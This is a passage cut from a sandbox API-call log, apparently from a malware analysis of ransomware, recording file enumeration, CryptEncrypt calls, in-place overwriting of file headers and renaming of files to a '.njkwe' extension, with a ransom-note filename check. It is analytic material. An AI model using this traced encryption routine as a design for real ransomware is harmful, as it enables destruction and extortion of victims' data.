HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.178] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0064.178] lstrcmpiW (lpString1="sqmapi.dll", lpString2="Windows") returned -1 [0064.178] lstrcmpiW (lpString1="sqmapi.dll", lpString2="$Recycle.bin") returned 1 [0064.178] lstrcmpiW (lpString1="sqmapi.dll", lpString2="System Volume Information") returned -1 [0064.179] lstrcmpiW (lpString1="sqmapi.dll", lpString2="Program Files") returned 1 [0064.179] lstrcmpiW (lpString1="sqmapi.dll", lpString2="Program Files (x86)") returned 1 [0064.179] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll") returned 36 [0064.179] StrStrIW (lpFirst="sqmapi.dll", lpSrch=".njkwe") returned 0x0 [0064.179] lstrcmpW (lpString1="sqmapi.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.179] lstrcmpW (lpString1="sqmapi.dll", lpString2="taridd") returned -1 [0064.179] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.179] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.179] GetTickCount () returned 0x1150740 [0064.179] GetTickCount () returned 0x1150740 [0064.179] GetTickCount () returned 0x1150740 [0064.179] GetTickCount () returned 0x1150740 [0064.179] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.179] GetProcessHeap () returned 0xbe0000 [0064.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.179] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.181] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.182] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.182] GetProcessHeap () returned 0xbe0000 [0064.182] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.182] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.182] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.182] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.182] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.183] CloseHandle (hObject=0x428) returned 1 [0064.186] GetProcessHeap () returned 0xbe0000 [0064.186] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.186] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll_r00t_{3sXlE5}.njkwe") returned 56 [0064.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll_r00t_{3sxle5}.njkwe")) returned 1 [0064.191] GetProcessHeap () returned 0xbe0000 [0064.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.191] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3704, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Strings.xml", cAlternateFileName="")) returned 1 [0064.191] lstrcmpiW (lpString1="Strings.xml", lpString2="Windows") returned -1 [0064.191] lstrcmpiW (lpString1="Strings.xml", lpString2="$Recycle.bin") returned 1 [0064.191] lstrcmpiW (lpString1="Strings.xml", lpString2="System Volume Information") returned -1 [0064.191] lstrcmpiW (lpString1="Strings.xml", lpString2="Program Files") returned 1 [0064.191] lstrcmpiW (lpString1="Strings.xml", lpString2="Program Files (x86)") returned 1 [0064.191] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml") returned 37 [0064.191] StrStrIW (lpFirst="Strings.xml", lpSrch=".njkwe") returned 0x0 [0064.191] lstrcmpW (lpString1="Strings.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.191] lstrcmpW (lpString1="Strings.xml", lpString2="taridd") returned -1 [0064.191] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.191] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.191] GetTickCount () returned 0x115074f [0064.191] GetTickCount () returned 0x115074f [0064.191] GetTickCount () returned 0x115074f [0064.191] GetTickCount () returned 0x115074f [0064.191] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.192] GetProcessHeap () returned 0xbe0000 [0064.192] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.192] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.193] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.193] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.193] GetProcessHeap () returned 0xbe0000 [0064.193] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.194] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.194] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.194] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.194] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.194] CloseHandle (hObject=0x428) returned 1 [0064.195] GetProcessHeap () returned 0xbe0000 [0064.195] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.195] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml_r00t_{3sXlE5}.njkwe") returned 57 [0064.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\strings.xml_r00t_{3sxle5}.njkwe")) returned 1 [0064.195] GetProcessHeap () returned 0xbe0000 [0064.195] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.195] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x97f2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0064.196] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Windows") returned -1 [0064.196] lstrcmpiW (lpString1="UiInfo.xml", lpString2="$Recycle.bin") returned 1 [0064.196] lstrcmpiW (lpString1="UiInfo.xml", lpString2="System Volume Information") returned 1 [0064.196] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Program Files") returned 1 [0064.196] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Program Files (x86)") returned 1 [0064.196] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml") returned 36 [0064.196] StrStrIW (lpFirst="UiInfo.xml", lpSrch=".njkwe") returned 0x0 [0064.196] lstrcmpW (lpString1="UiInfo.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.196] lstrcmpW (lpString1="UiInfo.xml", lpString2="taridd") returned 1 [0064.196] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.196] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.196] GetTickCount () returned 0x115075f [0064.196] GetTickCount () returned 0x115075f [0064.196] GetTickCount () returned 0x115075f [0064.196] GetTickCount () returned 0x115075f [0064.196] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.196] GetProcessHeap () returned 0xbe0000 [0064.196] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.196] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.198] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.198] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.198] GetProcessHeap () returned 0xbe0000 [0064.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.198] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.199] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.199] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.199] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.199] CloseHandle (hObject=0x428) returned 1 [0064.200] GetProcessHeap () returned 0xbe0000 [0064.200] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.200] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml_r00t_{3sXlE5}.njkwe") returned 56 [0064.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml_r00t_{3sxle5}.njkwe")) returned 1 [0064.201] GetProcessHeap () returned 0xbe0000 [0064.201] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.201] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0x19688, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="watermark.bmp", cAlternateFileName="WATERM~1.BMP")) returned 1 [0064.201] lstrcmpiW (lpString1="watermark.bmp", lpString2="Windows") returned -1 [0064.201] lstrcmpiW (lpString1="watermark.bmp", lpString2="$Recycle.bin") returned 1 [0064.201] lstrcmpiW (lpString1="watermark.bmp", lpString2="System Volume Information") returned 1 [0064.201] lstrcmpiW (lpString1="watermark.bmp", lpString2="Program Files") returned 1 [0064.201] lstrcmpiW (lpString1="watermark.bmp", lpString2="Program Files (x86)") returned 1 [0064.201] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp") returned 39 [0064.201] StrStrIW (lpFirst="watermark.bmp", lpSrch=".njkwe") returned 0x0 [0064.201] lstrcmpW (lpString1="watermark.bmp", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.201] lstrcmpW (lpString1="watermark.bmp", lpString2="taridd") returned 1 [0064.201] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.201] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.201] GetTickCount () returned 0x115075f [0064.201] GetTickCount () returned 0x115075f [0064.201] GetTickCount () returned 0x115075f [0064.201] GetTickCount () returned 0x115075f [0064.201] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.201] GetProcessHeap () returned 0xbe0000 [0064.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.201] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.207] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.208] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.208] GetProcessHeap () returned 0xbe0000 [0064.208] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.208] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.208] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.208] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.208] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.208] CloseHandle (hObject=0x428) returned 1 [0064.211] GetProcessHeap () returned 0xbe0000 [0064.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.211] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp_r00t_{3sXlE5}.njkwe") returned 59 [0064.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp_r00t_{3sxle5}.njkwe")) returned 1 [0064.212] GetProcessHeap () returned 0xbe0000 [0064.212] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.212] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Windows6.0-KB956250-v6001-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0064.212] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="Windows") returned 1 [0064.212] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="$Recycle.bin") returned 1 [0064.212] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="System Volume Information") returned 1 [0064.212] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="Program Files") returned 1 [0064.212] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="Program Files (x86)") returned 1 [0064.212] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 59 [0064.212] StrStrIW (lpFirst="Windows6.0-KB956250-v6001-x64.msu", lpSrch=".njkwe") returned 0x0 [0064.212] lstrcmpW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.212] lstrcmpW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="taridd") returned 1 [0064.212] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.212] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.213] GetTickCount () returned 0x115076f [0064.213] GetTickCount () returned 0x115076f [0064.213] GetTickCount () returned 0x115076f [0064.213] GetTickCount () returned 0x115076f [0064.214] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.214] GetProcessHeap () returned 0xbe0000 [0064.214] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.214] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.216] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.216] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.216] GetProcessHeap () returned 0xbe0000 [0064.216] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.216] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.216] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.218] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.218] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.218] CloseHandle (hObject=0x428) returned 1 [0064.426] GetProcessHeap () returned 0xbe0000 [0064.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.426] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu_r00t_{3sXlE5}.njkwe") returned 79 [0064.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu_r00t_{3sXlE5}.njkwe" (normalized: 